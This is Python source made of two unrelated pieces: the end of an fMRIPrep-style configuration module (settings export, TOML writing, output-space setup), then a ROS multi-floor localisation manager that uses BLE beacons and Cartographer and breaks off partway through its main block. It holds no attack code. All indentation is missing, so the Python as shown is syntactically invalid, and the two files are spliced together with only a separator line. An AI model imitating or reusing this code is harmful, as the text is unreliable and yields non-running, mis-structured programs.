"workflow": workflow.get(),
"nipype": nipype.get(),
"seeds": seeds.get(),
}
if not flat:
return settings
return {
".".join((section, k)): v
for section, configs in settings.items()
for k, v in configs.items()
}
def dumps():
"""Format config into toml."""
from toml import dumps
return dumps(get())
def to_filename(filename):
"""Write settings to file."""
filename = Path(filename)
filename.write_text(dumps())
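# Illustrative, standalone sketch (not part of fMRIPrep itself): the file written by
# ``to_filename`` is plain TOML laid out as ``[section]`` tables of key/value pairs,
# which is exactly the shape ``load`` above hands back to each section's ``load``.
# The helper name below is hypothetical and only demonstrates the round trip.
def _toml_roundtrip_example():
    from toml import dumps, loads
    settings = {"execution": {"log_level": 25, "boilerplate_only": False}}
    # True: sections and values survive the dump/parse round trip
    return loads(dumps(settings)) == settings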
def init_spaces(checkpoint=True):
"""Initialize the :attr:`~workflow.spaces` setting."""
from niworkflows.utils.spaces import Reference, SpatialReferences
spaces = execution.output_spaces or SpatialReferences()
if not isinstance(spaces, SpatialReferences):
spaces = SpatialReferences(
[ref for s in spaces.split(" ") for ref in Reference.from_string(s)]
)
if checkpoint and not spaces.is_cached():
spaces.checkpoint()
# Add the default standard space if not already present (required by several sub-workflows)
if "MNI152NLin2009cAsym" not in spaces.get_spaces(nonstandard=False, dim=(3,)):
spaces.add(Reference("MNI152NLin2009cAsym", {}))
# Ensure user-defined spatial references for outputs are correctly parsed.
# Certain options require normalization to a space not explicitly defined by users.
# These spaces will not be included in the final outputs.
if workflow.use_aroma:
# Make sure there's a normalization to FSL for AROMA to use.
spaces.add(Reference("MNI152NLin6Asym", {"res": "2"}))
cifti_output = workflow.cifti_output
if cifti_output:
# CIFTI grayordinates to corresponding FSL-MNI resolutions.
vol_res = "2" if cifti_output == "91k" else "1"
spaces.add(Reference("fsaverage", {"den": "164k"}))
spaces.add(Reference("MNI152NLin6Asym", {"res": vol_res}))
# Make the SpatialReferences object available
workflow.spaces = spaces
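# Illustrative sketch of how ``init_spaces`` interprets ``--output-spaces``
# (assumes niworkflows is installed; the values below are hypothetical):
#
#     execution.output_spaces = "MNI152NLin2009cAsym:res-2 anat"
#     init_spaces()
#     workflow.spaces.get_spaces(nonstandard=False, dim=(3,))
#
# Each space-separated token is parsed by ``Reference.from_string``; ``anat`` is a
# nonstandard space and is filtered out by ``nonstandard=False``, while
# ``MNI152NLin2009cAsym`` is kept (and would have been added by default anyway).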
|
multi_floor_manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2021 IBM Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import json
import argparse
import ast
import math
from enum import Enum
import numpy as np
import threading
import rospy
import roslaunch
import tf2_ros
import tf_conversions
from std_msgs.msg import String, Int64
from geometry_msgs.msg import TransformStamped, Vector3, Quaternion, Point, Pose
from geometry_msgs.msg import PoseStamped, PoseWithCovarianceStamped
from sensor_msgs.msg import Imu, PointCloud2, LaserScan, NavSatFix
from nav_msgs.msg import Odometry
from tf2_geometry_msgs import PoseStamped # necessary to use tfBuffer.transform(pose_stamped_msg, frame_id)
from tf2_geometry_msgs import PointStamped, Vector3Stamped
from cartographer_ros_msgs.msg import *
from cartographer_ros_msgs.srv import *
import geoutil
import resource_utils
from wireless_utils import extract_samples
from wireless_rss_localizer import SimpleRSSLocalizer
from mf_localization_msgs.msg import *
from mf_localization_msgs.srv import *
def json2anchor(jobj):
return geoutil.Anchor(lat = jobj["lat"],
lng = jobj["lng"],
rotate = jobj["rotate"],
)
class LocalizationMode(Enum):
INIT = "init"
TRACK = "track"
def __str__(self):
return self.value
def convert_samples_coordinate(samples, from_anchor, to_anchor, floor):
samples2 = []
for s in samples:
s2 = s.copy()
s2["information"] = s["information"].copy() # copy the nested dict so the original sample is not mutated
info = s["information"]
xy = geoutil.Point(x=info["x"], y= info["y"])
latlng = geoutil.local2global(xy, from_anchor)
local_coord = geoutil.global2local(latlng, to_anchor)
s2["information"]["x"] = local_coord.x
s2["information"]["y"] = local_coord.y
s2["information"]["floor"] = floor
samples2.append(s2)
return samples2
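# Illustrative sketch (hypothetical values): each RSS sample carries its local
# coordinates under "information", e.g.
#
#     {"information": {"x": 1.0, "y": 2.0, "floor": 1, ...}, ...}
#
# and convert_samples_coordinate re-expresses x/y in the frame of to_anchor by
# going through latitude/longitude: local -> global with from_anchor, then
# global -> local with to_anchor, finally stamping the given floor value.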
class FloorManager:
def __init__(self):
self.node_id = None
self.frame_id = None
self.localizer = None
self.map_filename = ""
# publisher
self.initialpose_pub = None
self.imu_pub = None
self.points_pub = None
# services
self.get_trajectory_states = None
self.finish_trajectory = None
self.start_trajectory = None
class MultiFloorManager:
def __init__(self):
# state variables
self.is_active = True
self.floor = None # state
self.area = None # state
self.current_frame = None # state
self.mode = None # state
self.valid_imu = False # state for input validation
self.valid_points2 = False # state for input validation
# for optimization detection
self.map2odom = None # state
self.optimization_detected = False # state
self.odom_displacement = 0 # used for print
# for loginfo
self.spin_count = 0
self.prev_spin_count = None
self.ble_localizer_dict = {}
self.ble_floor_localizer = None
# area identification
self.area_floor_const = 10000
self.area_localizer = None
self.seq_initialpose = 0
self.transforms = []
# average floor values
self.floor_queue_size = 10
self.floor_queue = [] # state
self.floor_list = [] # store known floor values
# failure detection
self.rmse_threshold = 5.0
self.loc_queue_min_size = 5
self.loc_queue_max_size = 10
self.loc_queue = []
self.loc_beacon_queue = []
# auto-relocalization
self.auto_relocalization = False
# frames
self.global_map_frame = "map"
self.local_map_frame = "map"
self.odom_frame = "odom"
self.published_frame = "base_link"
self.base_link_frame = "base_link"
self.global_position_frame = "base_link" # frame_id to compute global position
# publisher
self.current_floor_pub = rospy.Publisher("current_floor", Int64, latch=True, queue_size=10)
self.current_frame_pub = rospy.Publisher("current_frame", String, latch=True, queue_size=10)
self.current_map_filename_pub = rospy.Publisher("current_map_filename", String, latch=True, queue_size=10)
self.scan_matched_points2_pub = None
self.resetpose_pub = rospy.Publisher("resetpose", PoseWithCovarianceStamped, queue_size=10)
self.global_position_pub = rospy.Publisher("global_position", MFGlobalPosition, queue_size=10)
# Subscriber
self.scan_matched_points2_sub = None
# verbosity
self.verbose = False
# input data validation
self.norm_q_tolerance = 0.1 # to block [0,0,0,0] quaternion
self.norm_acc_threshold = 0.1 # to block [0,0,0] linear_acceleration
# for local_map_tf_timer_callback
self.local_map_tf = None
def imu_callback(self, msg):
# validate imu message
acc = msg.linear_acceleration
q = msg.orientation
acc_vec = np.array([acc.x, acc.y, acc.z])
q_vec = np.array([q.x, q.y, q.z, q.w])
norm_acc = np.linalg.norm(acc_vec)
norm_q = np.linalg.norm(q_vec)
if self.norm_acc_threshold <= norm_acc and np.abs(norm_q-1.0) < self.norm_q_tolerance:
self.valid_imu = True
else:
self.valid_imu = False
if not self.valid_imu:
rospy.loginfo("imu input is invalid. (linear_acceleration="+str(acc_vec)+", orientation="+str(q_vec)+")")
# use imu data
if (self.floor is not None) and (self.area is not None) and (self.mode is not None) and self.valid_imu:
imu_pub = self.ble_localizer_dict[self.floor][self.area][self.mode].imu_pub
imu_pub.publish(msg)
def scan_callback(self, msg):
# Not implemented
pass
def points_callback(self, msg):
# validate points input
self.valid_points2 = True # set true if points message is coming
if self.floor is not None and self.area is not None and self.mode is not None:
points_pub = self.ble_localizer_dict[self.floor][self.area][self.mode].points_pub
points_pub.publish(msg)
def odom_callback(self, msg):
if self.floor is not None and self.area is not None and self.mode is not None:
odom_pub = self.ble_localizer_dict[self.floor][self.area][self.mode].odom_pub
odom_pub.publish(msg)
def scan_matched_points2_callback(self, msg):
if self.scan_matched_points2_pub is None:
self.scan_matched_points2_pub = rospy.Publisher("scan_matched_points2", PointCloud2, queue_size=10)
self.scan_matched_points2_pub.publish(msg)
def initialpose_callback(self, pose_with_covariance_stamped_msg):
# PoseWithCovarianceStamped msg
# substitute ROS time to prevent error when gazebo is running and the pose message is published by rviz
pose_with_covariance_stamped_msg.header.stamp = rospy.Time.now()
if self.mode is None:
self.mode = LocalizationMode.INIT
if self.floor is None:
rospy.loginfo("floor is unknown. Set floor by calling /set_current_floor service before publishing the 2D pose estimate.")
if self.floor is not None and self.mode is not None:
# transform pose in the message from map frame to a local frame
pose_stamped_msg = PoseStamped()
pose_stamped_msg.header = pose_with_covariance_stamped_msg.header
pose_stamped_msg.pose = pose_with_covariance_stamped_msg.pose.pose
# detect area
x_area = [[pose_stamped_msg.pose.position.x, pose_stamped_msg.pose.position.y, float(self.floor)*self.area_floor_const]] # [x,y,floor]
self.area = self.area_localizer.predict(x_area)[0] # [area]
floor_manager = self.ble_localizer_dict[self.floor][self.area][self.mode]
initialpose_pub = floor_manager.initialpose_pub
frame_id = floor_manager.frame_id
map_filename = floor_manager.map_filename
transformed_pose_stamped = tfBuffer.transform(pose_stamped_msg, frame_id, timeout=rospy.Duration(1.0)) # timeout 1.0 s
pose_with_covariance_stamped_msg.header = transformed_pose_stamped.header
pose_with_covariance_stamped_msg.pose.pose = transformed_pose_stamped.pose
pose_with_covariance_stamped_msg.pose.pose.position.z = 0.0 # set z = 0 to ensure 2D position on the local map
initialpose_pub.publish(pose_with_covariance_stamped_msg)
# publish current floor
current_floor_msg = Int64()
current_floor_msg.data = self.floor
self.current_floor_pub.publish(current_floor_msg)
# publish current frame
self.current_frame = frame_id
current_frame_msg = String()
current_frame_msg.data = self.current_frame
self.current_frame_pub.publish(current_frame_msg)
# publish current map_filename
self.current_map_filename_pub.publish(map_filename)
# update scan matched points subscriber
node_id = floor_manager.node_id
if self.scan_matched_points2_sub is not None:
self.scan_matched_points2_sub.unregister()
self.scan_matched_points2_sub = rospy.Subscriber(node_id+"/"+str(self.mode)+"/"+"scan_matched_points2", PointCloud2, self.scan_matched_points2_callback)
def restart_floor(self, local_pose):
# set z = 0 to ensure 2D position on the local map
local_pose.position.z = 0.0
floor_manager = self.ble_localizer_dict[self.floor][self.area][self.mode]
frame_id = floor_manager.frame_id
initialpose_pub = floor_manager.initialpose_pub
map_filename = floor_manager.map_filename
### local_pose to pose_cov_stamped
pose_cov_stamped = PoseWithCovarianceStamped()
pose_cov_stamped.header.seq = self.seq_initialpose
self.seq_initialpose += 1
pose_cov_stamped.header.stamp = rospy.Time.now()
pose_cov_stamped.header.frame_id = frame_id
pose_cov_stamped.pose.pose = local_pose
covariance = np.diag(self.initial_pose_variance)
pose_cov_stamped.pose.covariance = list(covariance.flatten())
#initialpose_pub.publish(pose_cov_stamped)
#rospy.loginfo("published /"+ floor_manager.node_id+"/"+str(self.mode)+"/initialpose" )
self.resetpose_pub.publish(pose_cov_stamped)
status_code_start_trajectory = self.start_trajectory_with_pose(local_pose)
rospy.loginfo("called /"+ floor_manager.node_id+"/"+str(self.mode)+"/start_trajectory")
# publish current floor
current_floor_msg = Int64()
current_floor_msg.data = self.floor
self.current_floor_pub.publish(current_floor_msg)
# publish current frame
self.current_frame = frame_id
current_frame_msg = String()
current_frame_msg.data = self.current_frame
self.current_frame_pub.publish(current_frame_msg)
# publish current map_filename
self.current_map_filename_pub.publish(map_filename)
# update scan matched points subscriber
node_id = floor_manager.node_id
if self.scan_matched_points2_sub is not None:
self.scan_matched_points2_sub.unregister()
self.scan_matched_points2_sub = rospy.Subscriber(node_id+"/"+str(self.mode)+"/"+"scan_matched_points2", PointCloud2, self.scan_matched_points2_callback)
# simple failure detection based on the root mean square error between tracked and estimated locations
def check_localization_failure(self, loc_track, loc_est):
if self.verbose:
rospy.loginfo("loc_track="+str(loc_track)+", loc_est="+str(loc_est))
if self.loc_queue_max_size <= len(self.loc_queue):
self.loc_queue.pop(0)
self.loc_beacon_queue.pop(0)
self.loc_queue.append(loc_track)
self.loc_beacon_queue.append(loc_est)
failure_detected = False
if self.loc_queue_min_size <= len(self.loc_queue):
X1 = np.array(self.loc_queue)
X2 = np.array(self.loc_beacon_queue)
rmse = np.sqrt(np.mean(np.sum((X1-X2)**2, axis=1)))
if self.rmse_threshold <= rmse:
failure_detected = True
# clear location lists
self.loc_queue = []
self.loc_beacon_queue = []
if self.verbose:
rospy.loginfo("rmse="+str(rmse) + ", failure_detected="+str(failure_detected))
return failure_detected
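# Worked example (hypothetical numbers): with rmse_threshold = 5.0, tracked positions
# that sit around (0, 0) while the beacon-based estimates sit around (6, 8) give
# rmse = sqrt(6**2 + 8**2) = 10.0 >= 5.0, so failure_detected becomes True as soon as
# the queues hold at least loc_queue_min_size entries.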
def beacons_callback(self, message):
if self.verbose:
rospy.loginfo("multi_floor_manager.beacons_callback")
if not self.is_active:
# do nothing
return
data = json.loads(message.data)
beacons = data["data"]
# detect floor
loc = self.ble_floor_localizer.predict(beacons) # [[x,y,z,floor]]
if loc is None:
return
if self.verbose:
print("loc=",str(loc))
floor_raw = loc[0,3]
if len(self.floor_queue) < self.floor_queue_size:
self.floor_queue.append(floor_raw)
else:
self.floor_queue.pop(0)
self.floor_queue.append(floor_raw)
# use one of the known floor values closest to the mean value of floor_queue
mean_floor = np.mean(self.floor_queue)
idx_floor = np.abs(np.array(self.floor_list) - mean_floor).argmin()
floor = self.floor_list[idx_floor]
# detect area
x_area = [[loc[0,0], loc[0,1], floor*self.area_floor_const]] # [x,y,floor]
area = self.area_localizer.predict(x_area)[0] # [area]
if self.verbose:
rospy.loginfo("floor = "+str(floor) + ", area=" + str(area) )
# check other sensor data before starting a trajectory.
if not (self.valid_imu and self.valid_points2):
return # do not start a new trajectory if other sensor data are not ready.
# switch cartographer node
if self.floor is None:
self.floor = floor
self.area = area
self.mode = LocalizationMode.INIT
rospy.loginfo("initialize floor = "+str(self.floor))
# coarse initial localization on local frame (frame_id)
ble_localizer = self.ble_localizer_dict[self.floor][self.area][LocalizationMode.INIT].localizer
if ble_localizer is None:
raise RuntimeError("Unknown floor for BLE localizer "+str(self.floor))
# local_loc is on the local coordinate on frame_id
local_loc = ble_localizer.predict(beacons)
# project loc to sample locations
local_loc = ble_localizer.find_closest(local_loc)
# create a local pose instance
position = Point(local_loc[0,0], local_loc[0,1], local_loc[0,2]) # use the estimated position
orientation = Quaternion(0.0, 0.0, 0.0, 1.0) # orientation is unknown.
local_pose = Pose(position, orientation)
self.restart_floor(local_pose)
# floor change or init->track
elif self.floor != floor or (self.mode==LocalizationMode.INIT and self.optimization_detected):
if self.floor != floor:
rospy.loginfo("floor change detected (" + str(self.floor) + " -> " + str(floor) + ")." )
else:
rospy.loginfo("optimization_detected. change localization mode init->track (displacement="+str(self.odom_displacement)+")")
# set temporal variables
target_floor = floor
target_area = area
target_mode = LocalizationMode.TRACK
# check the availability of local_pose on the target frame
floor_manager = self.ble_localizer_dict[target_floor][target_area][target_mode]
frame_id = floor_manager.frame_id # target frame_id
local_transform = None
try:
# tf from the origin of the target floor to the robot pose
local_transform = tfBuffer.lookup_transform(frame_id, self.base_link_frame, rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
rospy.logerr('LookupTransform Error from '+ frame_id +" to " + self.base_link_frame )
# update the trajectory only when local_transform is available
if local_transform is not None:
if self.floor != floor: # floor change
pass # nothing to do
else:
self.optimization_detected = False
# create local_pose instance
position = local_transform.transform.translation # Vector3
orientation = local_transform.transform.rotation # Quaternion
local_pose = Pose(position, orientation)
# try to finish the current trajectory before updating state variables
self.finish_trajectory()
# update state variables to switch floor
self.floor = target_floor
self.area = target_area
self.mode = target_mode
# restart trajectory with the updated state variables
self.restart_floor(local_pose)
else:
# check localization failure
try:
t = tfBuffer.lookup_transform(self.global_map_frame, self.base_link_frame, rospy.Time(0))
loc2D_track = np.array([t.transform.translation.x, t.transform.translation.y])
loc2D_beacon = np.array([loc[0,0], loc[0,1]])
failure_detected = self.check_localization_failure(loc2D_track, loc2D_beacon)
if failure_detected and self.auto_relocalization:
self.restart_localization()
rospy.logerr("Auto-relocalization. (localization failure detected)")
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
rospy.loginfo('LookupTransform Error from '+ self.global_map_frame +" to " + self.base_link_frame)
# broadcast tf from global_map_frame to each (local) map_frame
# [deprecated]
#def transforms_timer_callback(self, timer):
# for t in self.transforms:
# t.header.stamp = rospy.Time.now() # update timestamp
# broadcaster.sendTransform(self.transforms)
# broadcast tf from global_map_frame to each (local) map_frame
def send_static_transforms(self):
for t in self.transforms:
t.header.stamp = rospy.Time.now() # update timestamp
static_broadcaster.sendTransform(self.transforms)
# broadcast tf between the current_frame to local_map_frame
def local_map_tf_timer_callback(self, timer):
if self.local_map_tf is None:
# initialization
t = TransformStamped()
t.child_frame_id = self.local_map_frame # static
t.transform.translation = Vector3(0.0, 0.0, 0.0) # static
q = tf_conversions.transformations.quaternion_from_euler(0, 0, 0, 'sxyz')
rotation = Quaternion(*q)
t.transform.rotation = rotation # static
# tentative values
t.header.stamp = rospy.Time.now()
t.header.frame_id = None
self.local_map_tf = t
if self.current_frame is not None:
t = self.local_map_tf
# send transform only when current_frame changes
if self.current_frame != t.header.frame_id:
t.header.stamp = rospy.Time.now()
t.header.frame_id = self.current_frame
transform_list = self.transforms + [t] # to keep self.transforms in static transform
static_broadcaster.sendTransform(transform_list)
# publish global position
def global_position_callback(self, timer):
averaging_interval = self.global_position_averaging_interval
try:
# convert global position on global_map_frame to lat lng
end_time = tfBuffer.get_latest_common_time(self.global_map_frame, self.global_position_frame) # latest available time
start_time = end_time - rospy.Duration(averaging_interval)
trans_pos = tfBuffer.lookup_transform(self.global_map_frame, self.global_position_frame, end_time)
xy = geoutil.Point(x=trans_pos.transform.translation.x, y=trans_pos.transform.translation.y)
latlng = geoutil.local2global(xy, self.global_anchor)
floor = self.floor
# convert robot rotation to heading
anchor_rotation = self.global_anchor.rotate # degrees (0 -> north, clock-wise)
euler_angles = tf_conversions.transformations.euler_from_quaternion([trans_pos.transform.rotation.x, trans_pos.transform.rotation.y, trans_pos.transform.rotation.z, trans_pos.transform.rotation.w], 'sxyz')
yaw_angle = euler_angles[2] # [roll, pitch, yaw]; yaw in radians (0 -> x-axis, counter-clockwise)
heading = anchor_rotation + 90.0 - 180.0*yaw_angle/math.pi # add 90 degrees to convert the x-axis yaw into a y-axis (north-based) heading
heading = heading % 360 # wrap heading into [0, 360) degrees
# compute velocity on odom_frame to prevent it from jumping
trans_vel_end = tfBuffer.lookup_transform(self.odom_frame, self.global_position_frame, end_time)
trans_vel_start = tfBuffer.lookup_transform(self.odom_frame, self.global_position_frame, start_time)
delta_x = trans_vel_end.transform.translation.x - trans_vel_start.transform.translation.x
delta_y = trans_vel_end.transform.translation.y - trans_vel_start.transform.translation.y
v_x = delta_x/averaging_interval
v_y = delta_y/averaging_interval
v_xy = math.sqrt(v_x**2 + v_y**2)
# create and publish an MFGlobalPosition message
global_position = MFGlobalPosition()
global_position.header.stamp = end_time
global_position.header.frame_id = self.global_position_frame
global_position.latitude = latlng.lat
global_position.longitude = latlng.lng
global_position.floor = floor
global_position.heading = heading
global_position.speed = v_xy
self.global_position_pub.publish(global_position)
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
rospy.loginfo('LookupTransform Error '+self.global_map_frame+" -> "+self.global_position_frame)
except tf2_ros.TransformException as e:
rospy.loginfo(str(e))
def stop_localization_callback(self, data):
resp = StatusResponse()
if not self.is_active:
resp.code = 1
resp.message = "Stop localization failed. (localization is aleady stopped.)"
return resp
try:
self.is_active = False
self.finish_trajectory()
self.reset_states()
resp.code = 0
resp.message = "Stopped localization."
except:
resp.code = 1
resp.message = "Stop localization failed."
return resp
def start_localization_callback(self, data):
resp = StatusResponse()
if self.is_active:
resp.code = 1
resp.message = "Start localization failed. (localization is aleady started.)"
return resp
self.is_active = True
resp.code = 0
resp.message = "Starting localization."
return resp
def finish_trajectory(self):
# try to finish the current trajectory
floor_manager = self.ble_localizer_dict[self.floor][self.area][self.mode]
get_trajectory_states = floor_manager.get_trajectory_states
finish_trajectory = floor_manager.finish_trajectory
res0 = get_trajectory_states()
rospy.loginfo(res0)
last_trajectory_id = res0.trajectory_states.trajectory_id[-1]
last_trajectory_state = ord(res0.trajectory_states.trajectory_state[-1]) # uint8 -> int
# finish trajectory only if the trajectory is active.
if last_trajectory_state in [TrajectoryStates.ACTIVE]:
trajectory_id_to_finish = last_trajectory_id
res1 = finish_trajectory(trajectory_id_to_finish)
rospy.loginfo(res1)
def start_trajectory_with_pose(self, initial_pose):
floor_manager = self.ble_localizer_dict[self.floor][self.area][self.mode]
start_trajectory = floor_manager.start_trajectory
# start trajectory
configuration_directory = floor_manager.configuration_directory
configuration_basename = floor_manager.configuration_basename
use_initial_pose = True
relative_to_trajectory_id = 0
res2 = start_trajectory(configuration_directory,
configuration_basename,
use_initial_pose,
initial_pose,
relative_to_trajectory_id
)
rospy.loginfo(res2)
status_code = res2.status.code
return status_code
def reset_states(self):
self.floor = None
self.area = None
self.current_frame = None
self.mode = None
self.map2odom = None
self.optimization_detected = False
self.floor_queue = []
self.spin_count = 0
self.prev_spin_count = None
self.valid_imu = False
self.valid_points2 = False
tfBuffer.clear() # clear buffered tf added by finished trajectories
def restart_localization(self):
self.is_active = False
self.finish_trajectory()
self.reset_states()
self.is_active = True
def restart_localization_callback(self, data):
resp = StatusResponse()
try:
self.restart_localization()
resp.code = 0
resp.message = "Restarting localization..."
except:
resp.code = 1
resp.message = "Restart localization failed."
return resp
def enable_relocalization_callback(self, data):
resp = StatusResponse()
self.auto_relocalization = True
resp.code = 0
resp.message = "Enabled auto relocalization."
return resp
def disable_relocalization_callback(self, data):
resp = StatusResponse()
self.auto_relocalization = False
resp.code = 0
resp.message = "Disabled auto relocalization."
return resp
def set_current_floor_callback(self, data):
resp = StatusResponse()
floor = int(data.data)
if self.floor is None:
self.floor = floor
resp.code = 0
resp.message = "Set floor to " + str(floor) + "."
else:
resp.code = 1
resp.message = "Failed to set floor to " + str(floor) + ". Floor is already set to "+str(self.floor)+"."
return resp
# input: MFLocalPosition local_position
# return: MFGlobalPosition global_position
def convert_local_to_global_callback(self, msg):
averaging_interval = self.global_position_averaging_interval
try:
pos = PointStamped()
vel = Vector3Stamped()
pos.header = msg.local_position.header
vel.header = msg.local_position.header
pos.point = msg.local_position.position
vel.vector = msg.local_position.velocity
transformed_position_stamped = tfBuffer.transform(pos, self.global_map_frame, timeout=rospy.Duration(1.0)) # timeout 1.0 s
transformed_velocity_stamped = tfBuffer.transform(vel, self.global_map_frame, timeout=rospy.Duration(1.0)) # timeout 1.0 s
# point to latlng
xy = geoutil.Point(x=transformed_position_stamped.point.x, y=transformed_position_stamped.point.y)
latlng = geoutil.local2global(xy, self.global_anchor)
floor = self.floor
# velocity vector to heading and speed
speed = np.sqrt(transformed_velocity_stamped.vector.x**2 + transformed_velocity_stamped.vector.y**2)
yaw_angle = np.arctan2(transformed_velocity_stamped.vector.y, transformed_velocity_stamped.vector.x) # heading angle
anchor_rotation = self.global_anchor.rotate # degrees (0 -> north, clock-wise)
heading = anchor_rotation + 90.0 - 180.0*yaw_angle/math.pi # add 90 degrees to convert the x-axis yaw into a y-axis (north-based) heading
heading = heading % 360 # wrap heading into [0, 360) degrees
# create an MFGlobalPosition message
global_position = MFGlobalPosition()
global_position.header.stamp = transformed_position_stamped.header.stamp
global_position.header.frame_id = self.global_position_frame
global_position.latitude = latlng.lat
global_position.longitude = latlng.lng
global_position.floor = floor
global_position.heading = heading
global_position.speed = speed
return global_position
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
rospy.loginfo('LookupTransform Error '+self.global_map_frame+" -> "+self.global_position_frame)
return None
except tf2_ros.TransformException as e:
return None
class CurrentPublisher:
def __init__(self, verbose=False):
self.verbose = verbose
self.publish_current_rate = rospy.get_param("~publish_current_rate", 0) # 0 for latch
self.current_floor = None
self.current_frame = None
self.current_map_filename = None
rospy.Subscriber("current_floor", Int64, self.current_floor_cb)
rospy.Subscriber("current_frame", String, self.current_frame_cb)
rospy.Subscriber("current_map_filename", String, self.current_map_filename_cb)
self.pub_floor = rospy.Publisher("current_floor", Int64, queue_size=max(self.publish_current_rate, 1))
self.pub_frame = rospy.Publisher("current_frame", String, queue_size=max(self.publish_current_rate, 1))
self.pub_map = rospy.Publisher("current_map_filename", String, queue_size=max(self.publish_current_rate, 1))
if self.publish_current_rate == 0:
if self.verbose:
rospy.loginfo("node will not publish current regularly (publish_current_rate = 0)")
return
self.thread = threading.Thread(target=self.publish_current)
self.thread.start()
def current_floor_cb(self, msg):
self.current_floor = msg
def current_frame_cb(self, msg):
self.current_frame = msg
def current_map_filename_cb(self, msg):
self.current_map_filename = msg
def publish_current(self):
rate = rospy.Rate(self.publish_current_rate)
if self.verbose:
rospy.loginfo("node will publish current regularly (publish_current_rate = {})".format(self.publish_current_rate))
while not rospy.is_shutdown():
#publish
if self.current_floor is not None:
if self.verbose:
rospy.loginfo("current_floor = {}".format(self.current_floor.data))
self.pub_floor.publish(self.current_floor)
if self.current_frame is not None:
if self.verbose:
rospy.loginfo("current_frame = {}".format(self.current_frame.data))
self.pub_frame.publish(self.current_frame)
if self.current_map_filename is not None:
if self.verbose:
rospy.loginfo("current_map_filename = {}".format(self.current_map_filename.data))
self.pub_map.publish(self.current_map_filename)
if self.verbose:
rospy.loginfo("try to publish")
rate.sleep()
if __name__ == "__main__":
rospy.init_node('multi_floor_manager')
launch = roslaunch.scriptapi.ROSLaunch()
launch.start()
sub_topics = rospy.get_param("~topic_list", ['beacons','wireless/beacons','wireless/wifi'])
static_broadcaster = tf2_ros.StaticTransformBroadcaster()
broadcaster = tf2_ros.TransformBroadcaster()
tfBuffer = tf2_ros.Buffer()
tfListener = tf2_ros.TransformListener(tfBuffer)
multi_floor_manager = MultiFloorManager()
# load node parameters
configuration_directory_raw = rospy.get_param("~configuration_directory")
configuration_file_prefix = rospy.get_param("~configuration_file_prefix")
temporary_directory_name = rospy.get_param("~temporary_directory_name", "tmp")
multi_floor_manager.local_map_frame = rospy.get_param("~local_map_frame", "map")
multi_floor_manager.global_map_frame = rospy.get_param("~global_map_frame", "map")
multi_floor_manager.odom_frame = rospy.get_param("~odom_frame", "odom")
multi_floor_manager.published_frame = rospy.get_param("~published_frame", "base_link")
multi_floor_manager.global_position_frame = rospy.get_param("~global_position_frame", "base_link")
meters_per_floor = rospy.get_param("~meters_per_floor", 5)
odom_dist_th = rospy.get_param("~odom_displacement_threshold", 0.1)
multi_floor_manager.floor_queue_size = rospy.get_param("~floor_queue_size", 3)
multi_floor_manager.initial_pose_variance = rospy.get_param("~initial_pose_variance", [3, 3, 0.1, 0, 0, 100])
n_neighbors_floor = rospy.get_param("~n_neighbors_floor", 3)
n_neighbors_local = rospy.get_param("~n_neighbors_local", 3)
min_beacons_floor = rospy.get_param("~min_beacons_floor", 3)
min_beacons_local = rospy.get_param("~min_beacons_local", 3)
# auto-relocalization parameters
multi_floor_manager.auto_relocalization = rospy.get_param("~auto_relocalization", False)
multi_floor_manager.rmse_threshold = rospy.get_param("~rmse_threshold", 5.0)
multi_floor_manager.loc_queue_min_size = rospy.get_param("~location_queue_min_size", 5)
multi_floor_manager.loc_queue_max_size = rospy.get_param("~location_queue_max_size", 10)
multi_floor_manager.verbose = rospy.get_param("~verbose", False)
# global position parameters
global_position_interval = rospy.get_param("~global_position_interval", 1.0) # default 1 [s] -> 1 [Hz]
multi_floor_manager.global_position_averaging_interval = rospy.get_param("~averaging_interval", 1.0) # default 1 [s]
current_publisher = CurrentPublisher(verbose=rospy.get_param("~verbose", False))
# configuration file check
configuration_directory = resource_utils.get_filename(configuration_directory_raw)
temporary_directory = os.path.join(configuration_directory, temporary_directory_name)
if not os.path.exists(temporary_directory):
rospy.logerr("temporary_directory ["+temporary_directory+"] does not exist.")
raise RuntimeError("temporary_directory ["+temporary_directory+"] does not exist.")
# resolve topic remapping
imu_topic_name = rospy.names.resolve_name("imu")
scan_topic_name = rospy.names.resolve_name("scan")
points2_topic_name = rospy.names.resolve_name("points2")
beacons_topic_name = rospy.names.resolve_name("beacons")
initialpose_topic_name = rospy.names.resolve_name("initialpose")
odom_topic_name = rospy.names.resolve_name("odom")
# rss offset parameter
rssi_offset = 0.0
robot = rospy.get_param("~robot", "")
# set from the dictionary
if rospy.has_param("~rssi_offset_list"):
rssi_offset_list = rospy.get_param("~rssi_offset_list")
if robot in rssi_offset_list.keys():
rssi_offset = rssi_offset_list[robot]
# overwrite rssi_offset if exists
if rospy.has_param("~rssi_offset"):
rssi_offset = rospy.get_param("~rssi_offset")
rospy.loginfo("rssi_offset="+str(rssi_offset))
# load the main anchor point
anchor_dict = rospy.get_param("~anchor")
map_list = rospy.get_param("~map_list")
modes = [LocalizationMode.INIT , LocalizationMode.TRACK]
global_anchor = geoutil.Anchor(lat = anchor_dict["latitude"],
lng = anchor_dict["longitude"],
rotate = anchor_dict["rotate"]
)
multi_floor_manager.global_anchor = global_anchor
